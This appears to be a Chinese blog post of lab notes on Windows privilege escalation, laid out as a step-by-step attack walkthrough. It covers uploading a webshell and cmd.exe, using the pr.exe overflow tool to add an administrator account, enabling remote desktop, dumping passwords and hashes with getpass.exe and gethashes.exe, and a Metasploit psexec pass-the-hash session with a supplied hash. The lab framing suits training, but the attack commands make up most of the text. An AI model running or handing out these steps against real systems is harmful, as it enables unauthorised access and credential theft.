2020-04-30权限提升、获取管理员密码、hash值kali远程连接

一、常见提权方法 

1、溢出漏洞提权

2、数据库提权

3、第三方软件提权

二、Cmd命令无法执行原因分析

1、Cmd命令无法执行分析

        主要原因是cmd.exe被管理员降权或删除,也有可能组件被删除。

2、Cmd命令执行解决方法

       通过脚本木马查找可读可写目录,上传cmd,调用cmd路径执行命令(找可读可写目录不要选带空格目录)。

       菜刀设置终端路径:setpc:\test\cmd.exe

三、提权常用命令讲解(windows系统)

whoami ——查看用户权限

systeminfo ——查看操作系统,补丁情况

ipconfig——查看当前服务器IP ipconfig /all

net user——查看当前用户情况

netstat ——查看当前网络连接情况  netstat –ano  /netstat –an

| find “ESTABLISHED”

tasklist ——查看当前进程情况 tasklist /svc

taskkill ——结束进程 taskkill -PID xx

net start  ——启动服务

net stop ——停止服务

net user best 123456 /add 添加用户名为best,密码为123456

net localgroup administrators best /add 将用户名为best的用户添加到管理员组

net user best /del 删除best用户

四、完成windows溢出提权实验(提权工具pr.exe)

首先将一句话木马上传到虚拟机中,然后打开

查看当前用户是什么用户

选择进入目录cd c:\wmpub

查看当前属于什么用户     whoami

然后上传pr.exe工具到c:wmpub目录(找可读可写目录不要选带空格目录)

添加用户执行命令:pr.exe "net user 123 123 /add"

删除用户命令执行:pr.exe "net user 123 /del"

利用工具开启3389远程连接

首上传开启3389工具,然后用命令执行

五、本地管理员密码如何直接提取(或者用cs工具获取)

用菜刀上传getpass.exe 工具

pr.exe "getpass.exe >>c:\wmpub\1.txt"

如果菜刀操作超时时,我们可以在本机上执行,打开cmd运行,输入getpass.exe

读取hash值,使用gethashes.exe工具

pr.exe "gethashes.exe $local"

找到sam文件,这个文件是存储操作系统账号密码的文件,是hash加密的

利用kali远程连接(通过低版kail2.0完成hash远程连接)

root@kalieee:~# msfconsole

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > set rhost 192.168.2.107

msf5 exploit(windows/smb/psexec) > set smbuser administrator

msf5 exploit(windows/smb/psexec) > set smbpass 970E5570CCBF26E2AAD3B435B51404EE:C024BB7D17DDFF2CC270255F56FA4B24

msf5 exploit(windows/smb/psexec) > exploit

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。